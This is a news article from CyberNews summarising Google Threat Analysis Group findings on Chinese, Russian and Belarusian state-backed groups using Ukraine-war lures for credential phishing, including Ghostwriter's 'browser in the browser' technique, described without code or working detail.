© 2023 CyberNews - Latest tech news,
product reviews, and analyses.

If you purchase via links on our site, we may receive affiliate commissions.

Russian, Chinese, and Belarusian actors increasingly exploit Ukrainian tragedy for phishing

State-sponsored threat actors from China, Iran, North Korea, Russia, and Belarus, among others, have exploited Ukrainian war-related topics for their financial benefit.

Criminals are using current events in this war-torn Eastern European country to target their victims.

According to Google's Threat Analysis Group (TAG), one actor is impersonating military personnel to extort money for rescuing relatives in Ukraine.

Government-backed actors and many unattributed hacker groups are tricking targets into opening malicious emails and clicking on malicious links.

Over the past two weeks, TAG has observed three particularly active criminal groups trying to monetize the war in Ukraine.

Curious Gorge, backed by China's People's Liberation Army Strategic Support Force, has conducted campaigns against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia.

Russian-based Coldriver (Calisto) has launched credential phishing campaigns, targeting several US-based NGOs and think tanks, the military of a Balkans country, and a Ukraine-based defense contractor.

"However, for the first time, TAG has observed Coldriver campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence. These campaigns were sent using newly created Gmail accounts to non-Google accounts, so the success rate of these campaigns is unknown. We have not observed any Gmail accounts successfully compromised during these campaigns," Google noted.

Belarusian threat actor Ghostwriter recently introduced a new capability into their credential phishing campaigns – a 'browser in the browser' phishing technique.

"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites," Google said.

Phishing page
The new technique draws a login page that appears to be on the passport.i.ua domain, overtop of the page hosted on the compromised site. Once a user provides credentials in the dialog, they are posted to an attacker-controlled domain.

Ghostwriter has also conducted credential phishing campaigns against the Polish and Ukrainian government and military organizations at the beginning of the Russian invasion of Ukraine.

In the last 12 months, Google's Threat Analysis Group has issued hundreds of government-backed attack warnings to Ukrainian users, alerting them that they have been the target of government-backed hacking, mainly emanating from Russia.

FancyBear, a threat actor attributed to the Russian intelligence agency GRU, has conducted several large credential phishing campaigns targeting ukr.net users. UkrNet is a Ukrainian media company.

China-based threat actor Mustang Panda has targeted European entities with lures related to the Ukrainian invasion.

More from Cybernews:

Russian aviation authority switches to paper after losing 65TB of data

Russia's cybercriminals fear sanctions will erase their wealth

Data shows the growth in cloud-based security breaches

FBI reveals Russian hackers were found scanning US energy networks

Ronin robbed of $625m in digital funds

The White House seeks $10.9 billion in cybersecurity funding

Subscribe to our newsletter

Leave a Reply

Your email address will not be published. Required fields are marked